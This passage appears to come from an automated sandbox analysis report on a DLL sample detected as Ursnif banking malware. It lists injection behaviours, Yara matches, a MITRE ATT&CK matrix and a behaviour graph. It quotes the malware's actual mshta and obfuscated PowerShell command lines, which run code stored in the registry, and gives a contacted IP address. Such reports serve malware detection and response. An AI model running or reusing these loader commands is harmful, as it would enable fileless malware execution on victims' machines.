                      Source: mshta.exe, 00000019.00000002.353852606.000001F2003AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: explorer.exe, 00000023.00000000.448654073.0000000005137000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 176.10.119.68 80
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78E8112E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78E8112E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 358000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2480000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 35A000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2470000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copy
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Allocates memory in foreign processes
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2470000 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 358000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 2480000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 35A000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 2470000 value: 80
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1308
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616
                      Source: C:\Windows\System32\control.exeThread register set: target process: 6160
                      Source: C:\Windows\explorer.exeThread register set: target process: 4440
                      Source: C:\Windows\explorer.exeThread register set: target process: 4724
                      Source: C:\Windows\explorer.exeThread register set: target process: 4960
                      Source: C:\Windows\explorer.exeThread register set: target process: 3340
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qiip='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qiip).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000023.00000000.451165149.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.430587488.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.415855270.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000023.00000000.429667493.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.407089637.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.430587488.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000023.00000000.430587488.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.431581264.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.407631354.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 00000023.00000000.430587488.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.431581264.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.407631354.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01353365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01354B89 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01356D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01353365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation                      		Path Interception812
                      Process Injection                      		1
                      Obfuscated Files or Information                      		3
                      Credential API Hooking                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)Logon Script (Windows)4
                      Rootkit                      		Security Account Manager1
                      File and Directory Discovery                      		SMB/Windows Admin Shares3
                      Credential API Hooking                      		Automated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Masquerading                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script31
                      Virtualization/Sandbox Evasion                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common812
                      Process Injection                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Rundll32                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 633910 Sample: 628df1368bdb5.dll Startdate: 25/05/2022 Architecture: WINDOWS Score: 100 58 Snort IDS alert for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 7 other signatures 2->64 9 mshta.exe 19 2->9         started        11 loaddll32.exe 1 2->11         started        process3 process4 13 powershell.exe 33 9->13         started        16 cmd.exe 1 11->16         started        18 WerFault.exe 3 9 11->18         started        20 WerFault.exe 9 11->20         started        22 WerFault.exe 3 9 11->22         started        signatures5 94 Injects code into the Windows Explorer (explorer.exe) 13->94 96 Writes to foreign memory regions 13->96 98 Modifies the context of a thread in another process (thread injection) 13->98 100 2 other signatures 13->100 24 explorer.exe 13->24 injected 28 csc.exe 3 13->28         started        31 csc.exe 13->31         started        33 conhost.exe 13->33         started        35 rundll32.exe 1 6 16->35         started        process6 dnsIp7 54 192.168.2.1 unknown unknown 24->54 78 Changes memory attributes in foreign processes to executable or writable 24->78 80 Self deletion via cmd delete 24->80 82 Maps a DLL or memory area into another process 24->82 92 2 other signatures 24->92 37 cmd.exe 24->37         started        50 C:\Users\user\AppData\Local\...\vebwfha3.dll, PE32 28->50 dropped 40 cvtres.exe 28->40         started        52 C:\Users\user\AppData\Local\...\hpvnexdj.dll, PE32 31->52 dropped 42 cvtres.exe 31->42         started        56 176.10.119.68, 49770, 80 AS-SOFTPLUSCH Switzerland 35->56 84 System process connects to network (likely due to code injection or exploit) 35->84 86 Writes to foreign memory regions 35->86 88 Modifies the context of a thread in another process (thread injection) 35->88 90 Writes registry values via WMI 35->90 44 control.exe 35->44         started        file8 signatures9 process10 signatures11 66 Uses ping.exe to 